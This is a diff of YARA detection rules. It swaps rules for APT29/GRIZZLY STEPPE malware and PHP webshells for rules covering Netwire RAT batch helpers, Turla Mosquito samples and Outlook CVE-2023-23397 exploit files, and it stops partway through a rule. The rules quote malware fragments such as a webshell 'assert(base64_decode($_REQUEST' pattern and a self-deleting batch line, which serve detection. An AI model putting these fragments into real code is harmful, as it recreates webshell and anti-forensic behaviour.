+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_netwire_rat.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d4a06fbf875ba2dbe64abcc21fab4eea1fe1b092498a09d9a310214562c1869e"
-		score = 75
+		logic_hash = "9cb66435b78893daa5583475b14f0df2a5e8612f3aaf5cb02160991ab4d57d1b"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
+		hash1 = "6de7f0276afa633044c375c5c630740af51e29b6a6f17a64fbdd227c641727a4"
 
 	strings:
-		$s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
-		$s2 = "Repeat last find command)Replace specific text with different text" fullword wide
-		$s3 = "l\\Processor(0)\\% Processor Time" fullword wide
-		$s6 = "Self Process" fullword wide
-		$s7 = "Default Process" fullword wide
-		$s8 = "Star Polk.exe" fullword wide
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion"
+		$s2 = "Error! Bad token or internal error" fullword ascii
+		$s3 = "CRYPTBASE" fullword ascii
+		$s4 = "UXTHEME" fullword ascii
+		$s5 = "PROPSYS" fullword ascii
+		$s6 = "APPHELP" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_2 : FILE
+rule SIGNATURE_BASE_Suspicious_BAT_Strings : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects a string also used in Netwire RAT auxilliary"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37cfba67-af85-5efe-9b07-9f1e5d9f9195"
-		date = "2016-12-29"
+		id = "5fe28555-96c8-54da-b047-7d0a7532a6d2"
+		date = "2018-01-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/WVflzO"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L30-L50"
+		reference = "https://pastebin.com/8qaiyPxs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_netwire_rat.yar#L32-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "134a76129ef2169ac60f21541ef51a223720badfad02f0822acc7fd6d49cf7e7"
-		score = 75
+		logic_hash = "e643a5ef41d084e1b1a20be2c56328b72fedddbbce3c79d1e93cc8cfaa633e12"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
-		hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
 
 	strings:
-		$x1 = "GoogleCrashReport.dll" fullword ascii
-		$s1 = "CrashErrors" fullword ascii
-		$s2 = "CrashSend" fullword ascii
-		$s3 = "CrashAddData" fullword ascii
-		$s4 = "CrashCleanup" fullword ascii
-		$s5 = "CrashInit" fullword ascii
+		$s1 = "ping 192.0.2.2 -n 1" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_PAS_TOOL_PHP_WEB_KIT_Mod : FILE
+rule SIGNATURE_BASE_Malicious_BAT_Strings : FILE
 {
 	meta:
-		description = "Detects PAS Tool PHP Web Kit"
-		author = "US CERT - modified by Florian Roth due to performance reasons"
-		id = "6bc75e44-7784-5e48-9bbc-052d84ebee83"
-		date = "2016-12-29"
+		description = "Detects a string also used in Netwire RAT auxilliary"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6e197d05-62eb-535d-8cd6-db8550e51588"
+		date = "2018-01-05"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L52-L74"
+		reference = "https://pastebin.com/8qaiyPxs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_netwire_rat.yar#L47-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fab894d9609c1fca4a85457e6799d082dfd3eb9ca0564abc04a1a0dd07a7b546"
-		score = 75
+		logic_hash = "1f39b3fd11e7450eb1eaddeeca60aa4970568efda6053029f85df42e2f9fdd6e"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$php = "<?php"
-		$base64decode1 = "='base'.("
-		$strreplace = "str_replace(\"\\n\", ''"
-		$md5 = ".substr(md5(strrev("
-		$gzinflate = "gzinflate"
-		$cookie = "_COOKIE"
-		$isset = "isset"
+		$s1 = "call :deleteSelf&exit /b"
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and $php at 0 and ( filesize > 10KB and filesize < 30KB ) and #cookie == 2 and #isset == 3 and all of them
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V3 : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_1 : FILE
 {
 	meta:
-		description = "Detects PAS Tool PHP Web Kit"
+		description = "Detects malware sample from Turla Mosquito report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc5fa2c9-3e1e-594d-be4f-141e1f4915f1"
-		date = "2016-01-01"
+		id = "1395509a-72f5-56c0-895c-3e9f15829de1"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "https://github.com/wordfence/grizzly"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L76-L95"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L13-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21bf0afcd3f8de813ddfe41ef32e45806e9f9d7d3b08ae7ce65017c35e32a868"
+		logic_hash = "22d799531986c30da19943f1dda305e61a305083478549e93c0ecddeade77b39"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
 
 	strings:
-		$php = "<?php $"
-		$php2 = "@assert(base64_decode($_REQUEST["
-		$s1 = "(str_replace(\"\\n\", '', '"
-		$s2 = "(strrev($" ascii
-		$s3 = "de'.'code';" ascii
+		$s1 = "Pipetp" fullword ascii
+		$s2 = "EStOpnabn" fullword ascii
 
 	condition:
-		(( uint32( 0 ) == 0x68703f3c and $php at 0 ) or $php2 ) and filesize > 8KB and filesize < 100KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "169d4237c79549303cca870592278f42" or all of them )
 }
-rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V4 : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_2 : FILE
 {
 	meta:
-		description = "Detects PAS Tool PHP Web Kit"
+		description = "Detects malware sample from Turla Mosquito report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a5f915cd-b9c5-5cd3-b0a2-c15f6124737a"
-		date = "2016-01-01"
+		id = "d23d9fe1-26e3-5012-8a88-61ebbc3fbd8f"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "https://github.com/wordfence/grizzly"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L97-L116"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L32-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e2eaa0abd14f4dd08815c44797df707a08df1ea4e04ae69ba67d128a0fe4eff5"
+		logic_hash = "f1f93d3bc1c4bd55fc7558716a0a1eb7a6c4c2381a4532d37f4e3559f7c809ea"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
+		hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
 
 	strings:
-		$php = "<?php $"
-		$s1 = "(StR_ReplAcE(\"\\n\",'',"
-		$s2 = ";if(PHP_VERSION<'5'){" ascii
-		$s3 = "=SuBstr_rePlACe(" ascii
+		$s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii
+		$s3 = "no_address" fullword wide
+		$s6 = "SRRRQP" fullword ascii
+		$s7 = "QWVPQQ" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "cd918073f209c5da7a16b6c125d73746" or all of them )
 }
-rule SIGNATURE_BASE_APT_APT29_Wellmess_Dotnet_Unique_Strings : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_3 : FILE
 {
 	meta:
-		description = "Rule to detect WellMess .NET samples based on unique strings and function/variable names"
-		author = "NCSC"
-		id = "7a058ec7-f795-5226-b511-ff469a969ee6"
-		date = "2023-12-05"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c83e0a93-3f8d-572d-ac1a-92fef0b3d3f6"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L120-L136"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L54-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41"
-		logic_hash = "90e8480aa50e18202007bcffdc8348290ad0ac0588c924b4f75ea425a6cae32d"
+		logic_hash = "0f59c130b500625466da0c8b5bfd84051ee59a3b6261ee3d990d4c355b10672b"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
 
 	strings:
-		$s1 = "HealthInterval" wide
-		$s2 = "Hello from Proxy" wide
-		$s3 = "Start bot:" wide
-		$s4 = "FromNormalToBase64" ascii
-		$s5 = "FromBase64ToNormal" ascii
-		$s6 = "WellMess" ascii
+		$x1 = "InstructionerDLL.dll" fullword ascii
+		$s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
+		$s2 = "/scripts/m/query.php?id=" fullword wide
+		$s3 = "SELECT * FROM AntiVirusProduct" fullword ascii
+		$s4 = "Microsoft Update" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint16( 0x3c ) ) == 0x4550 and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "88488fe0b8bcd6e379dea6433bb5d7d8" or ( pe.exports ( "InstallRoutineW" ) and pe.exports ( "StartRoutine" ) ) or $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_Schedule : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_4 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on the key schedule used for encryption"
-		author = "NCSC"
-		id = "8d89edc1-a9fc-5155-9dc2-8d7f952f90d1"
-		date = "2023-12-05"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1d5c32b3-0316-525c-9386-222917144251"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L138-L153"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L79-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "d4f7ec82e51f1063b4d61302e5ff9268dd3233bb44269fc32cb57fb9240f96e2"
+		logic_hash = "4765b912258491f38c03513204d9af8bc62c37df2fe583e371cbbeff6fc12298"
 		score = 75
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$ = { C7 05 ?? ?? ?? ?? 63 51 E1 B7 B8 ?? ?? ?? ?? 8B 48
-            FC 81 E9 47 86 C8 61 89 08 83 C0 04 3D ?? ?? ?? ??
-            7E EB 33 D2 33 C9 B8 2C 00 00 00 89 55 D4 33 F6 89
-            4D D8 33 DB 3B F8 0F 4F C7 8D 04 40 89 45 D0 83 F8
-            01 7C 4F 0F 1F 80 00 00 00 00 }
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "17b328245e2874a76c2f46f9a92c3bad"
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_2B62 : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_5 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on hardcoded encryption key"
-		author = "NCSC"
-		id = "9a7abad7-1cfa-52c8-9416-47cb80486714"
-		date = "2023-12-05"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f3a35c9-b0f0-5ca6-8b34-19e2d45305f2"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L155-L167"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L92-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "39ad6de70883fbe0377379c3cab15962372793043ebbf4054efb7cee3aff9104"
+		logic_hash = "5b0366194410f36c47dd41f6a36c45edbce75e3ddad19520b17bed59513e1dbc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$ = "2b6233eb3e872ff78988f4a8f3f6a3ba"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "ac40cf7479f53a4754ac6481a4f24e57"
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Directory_Enumeration_Output_Strings : FILE
+rule SIGNATURE_BASE_Turlamosquito_Mal_6 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on formatted string output for directory enumeration"
-		author = "NCSC"
-		id = "e24dbda1-3d43-52a7-9249-70a648f4913e"
-		date = "2023-12-05"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1c320b60-ec7a-5f87-b871-f55924351f8f"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L169-L183"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L105-L127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "8f029269f5a383737f38af04b05a16a71af5453bffe83e04ac53191eaa49d3e7"
+		logic_hash = "9ca6ae4313ad8f009b17188aa7184ff01a4b7e35926f3f68dc3aea12bffb9bb1"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
 
 	strings:
-		$ = "----------All usres directory----------"
-		$ = "----------Desktop directory----------"
-		$ = "----------Documents directory----------"
+		$a1 = "/scripts/m/query.php?id=" fullword wide
+		$a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
+		$a3 = "GetUserNameW fails" fullword wide
+		$s1 = "QVSWQQ" fullword ascii
+		$s2 = "SRRRQP" fullword ascii
+		$s3 = "QSVVQQ" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 2 of ( $a* ) or 4 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Command_Elem_Cookie_Ga_Boundary_String : FILE
+
+rule SIGNATURE_BASE_APT_Turlamosquito_MAL_Oct22_1 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on scheduled task element and Cookie header/boundary strings"
-		author = "NCSC"
-		id = "3c6ffbad-9b39-5518-aa66-d76531ddb9ea"
-		date = "2023-12-05"
+		description = "Detects Turla Mosquito malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f5ad0c0f-81ca-5157-aefb-ead049ada30d"
+		date = "2022-10-25"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L185-L199"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L129-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "65b31a12d8abb88fbb99fcc6b2707bec90e4edc35d0cf21903213eda5cacec88"
-		score = 75
+		logic_hash = "fbaca774d6398aac7c171a5d87aa456a1921c1b80449d06f392b088db33ee845"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		hash1 = "6b9e48e3f4873cfb95639d9944fe60e3b056daaa2ea914add14c982e3e11128b"
+		hash2 = "b868b674476418bbdffbe0f3d617d1cce4c2b9dae0eaf3414e538376523e8405"
+		hash3 = "e7fd14ca45818044690ca67f201cc8cfb916ccc941a105927fc4c932c72b425d"
 
 	strings:
-		$ = "<Command>" wide
-		$ = "Cookie:_ga="
-		$ = "------974767299852498929531610575"
+		$s1 = "Logger32.dll" ascii fullword
+		$s4 = " executing %u command on drive %martCommand : CWin32ApiErrorExce" wide
+		$s5 = "Unsupported drive!!!" ascii fullword
+		$s7 = "D:\\Build_SVN\\PC_MAGICIAN_4." ascii fullword
+		$op1 = { 40 cc 8b 8b 06 cc 55 00 70 8b 10 10 33 51 04 46 04 64 }
+		$op2 = { c3 10 e8 50 04 00 cc ff 8d 00 69 8d 75 ff 68 ec 6a 4d }
+		$op3 = { e8 64 a1 6e 00 64 a1 c2 04 08 75 40 73 1d 8b ff cc 10 89 cc 8b c3 cc af }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "073235ae6dfbb1bf5db68a039a7b7726" or all of them )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Round_Function : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on the encryption round function"
-		author = "NCSC"
-		id = "0be1c084-c8df-5920-a320-90364a7fb542"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L201-L214"
+		description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
+		author = "delivr.to, modified by Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
+		id = "0a4d7bbe-1e17-5240-ad0f-29511752b267"
+		date = "2023-03-15"
+		modified = "2024-12-03"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2023_23397.yar#L1-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "c4979b7ec31581b43b6975be5d4b1bfa5562e5fe25bbb51bb7c388550ed80ac6"
-		score = 75
+		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
+		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
+		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
+		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
+		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
+		logic_hash = "fbbbaf5cd858078adddc80b9c9c56cb448613da28206a91778d22cd1cf64655e"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-23397, FILE"
 
 	strings:
-		$ = { 8A E9 8A FB 8A 5D 0F 02 C9 88 45 0F FE C1 0F BE C5 88 6D F3 8D
-            14 45 01 00 00 00 0F AF D0 0F BE C5 0F BE C9 0F AF C8 C1 FA 1B C0 E1 05 0A D1 8B 4D EC 0F BE C1 89 55 E4 8D 14 45 01 00 00 00 0F AF D0 8B C1}
+		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
+		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$rfp = { 1F 85 00 00 }
+		$u1 = { 00 00 5C 00 5C 00 }
+		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
+		$fp_asd = "theme/theme1.xml"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and 1 of ( $psetid* ) and $rfp and $u1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Add_Random_Commas_Spaces : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 : CVE_2023_23397 FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on function that adds commas and spaces"
-		author = "NCSC"
-		id = "9a89c619-6309-500f-b4dc-c8a3e8fc4417"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L216-L229"
+		description = "Detects suspicious .msg file with a PidLidReminderFileParameter property exploiting CVE-2023-23397 (modified delivr.to rule - more specific = less FPs but limited to exfil using IP addresses, not FQDNs)"
+		author = "delivr.to, Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
+		id = "d85bf1d9-aebe-5f8c-9dd4-c509f64e221a"
+		date = "2023-03-15"
+		modified = "2023-03-18"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2023_23397.yar#L41-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "046e222aabc9e596d9536702521b4729d990e1f327ded004ca984b73a8511a83"
+		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
+		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
+		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
+		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
+		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
+		hash = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
+		logic_hash = "a8e8326f5aaa29b449f9203623e03d3d3a1d176bb764171d860afc510a1732e6"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-23397, FILE"
 
 	strings:
-		$ = { E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B CE 83 FA 04 7E 09 6A
-            02 68 ?? ?? ?? ?? EB 07 6A 01 68 }
+		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
+		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$rfp = { 1F 85 00 00 }
+		$u1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 3? 00 3? 00|3? 00 3? 00|3? 00) }
